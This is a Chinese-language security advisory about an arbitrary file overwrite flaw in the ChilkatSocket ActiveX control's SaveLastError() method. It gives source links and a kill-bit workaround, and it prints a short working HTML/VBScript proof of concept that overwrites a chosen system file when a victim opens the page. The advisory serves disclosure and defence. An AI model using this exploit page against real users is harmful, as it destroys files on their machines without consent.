发布日期：2008-11-17
更新日期：2008-11-19

受影响系统：

Chilkat Software ChilkatSocket.DLL 2.3.1.1

描述：

---

BUGTRAQ  ID: 32333

Chilkat socket组件为TCP/IP套接字编程提供简单易用的API。

ChilkatSocket.ChilkatSocket.1 ActiveX控件（ChilkatSocket.dll）没有正确地验证对SaveLastError()方式所提供的输入参数，如果远程攻击者受骗访问了恶意网页并向该方式传送了恶意输入的话，就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。

<*来源：Zigma
  
  链接：http://secunia.com/advisories/32738/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<object classid='clsid:474FCCCD-1B89-4D34-9E09-45807F23289C' id='boom' ></object>
<script language='vbscript'>
arg1="c:\winnt\uz_.exe"
boom.SaveLastError arg1
</script>
</body>
<html>

建议：

---

临时解决方法：

* 为clsid 474FCCCD-1B89-4D34-9E09-45807F23289C设置kill bit。

厂商补丁：

Chilkat Software
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.chilkatsoft.com/

浏览次数：2374
严重程度：0（网友投票）